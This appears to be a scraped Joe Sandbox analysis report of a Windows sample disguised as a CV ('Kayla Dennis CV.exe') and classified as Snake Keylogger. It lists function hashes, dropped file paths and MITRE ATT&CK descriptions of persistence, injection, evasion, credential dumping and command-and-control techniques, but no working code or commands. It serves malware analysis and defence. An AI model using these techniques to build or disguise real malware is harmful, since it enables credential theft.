Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a46ca1fc8f555bab30cf5dbc594ae11af6ce14e73c71b55ac752b7a678051bc8
Instruction ID: ec6dae78b18c7c3747d6523eb8bd69db39b96be75c8a9ec74bd61a87075303f1
Opcode Fuzzy Hash: a46ca1fc8f555bab30cf5dbc594ae11af6ce14e73c71b55ac752b7a678051bc8
Instruction Fuzzy Hash: C4216A71D012099BDB18CFAAD984ADDFBF2BF88300F24952AE404B7390C730598ACB50

Function 05639D8C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 05639ECE

Memory Dump Source

Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a09f1dab672439a7729979038b1bdd72bf3b4faaafaddde65e85b37b76c68ba
Instruction ID: 3e0395bbf90c66379fc8acfe64f4492b95435d8068a363d0523833ffef023867
Opcode Fuzzy Hash: 7a09f1dab672439a7729979038b1bdd72bf3b4faaafaddde65e85b37b76c68ba
Instruction Fuzzy Hash: 7D115674E041098BDB08DFA8D485EEDBBB5BF88304F54C169E804A7346DBB0E945CF20

Function 00FBD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3288182001.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_fbd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18410af847789ffd3dac853f98eb05f485d8ba1d6b9ac422231201bb7f33aeb6
Instruction ID: 0fd43329b02cddd6be67901578908cd2637703e408218bd6b19f9b16e528bd06
Opcode Fuzzy Hash: 18410af847789ffd3dac853f98eb05f485d8ba1d6b9ac422231201bb7f33aeb6
Instruction Fuzzy Hash: BD212271A042049FDB14EF24C9C0B26BB65FB84324F20C569E8490B25AD73AD846EF62

Function 00FBD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3288182001.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_fbd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: d59319e1fa09ad000934c5f00ae29062d122ce7a9b250075e93b9c8990a6488a
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 2011DD75904284CFDB12CF14C9C4B15BFA2FB84324F24C6A9D8494B256C33AD84ADF62

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Kayla Dennis CV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Kayla Dennis CV.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lyKbfEsVYfQfU.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dije5tfe.4l3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbx3wcr4.v1o.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idfwexfp.szr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rw1q1ujt.44t.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sv33tv2a.etd.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udqbplrx.3c3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1xs4nun.ptp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylwee3hn.xov.ps1

C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp

Windows Analysis Report
Kayla Dennis CV.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre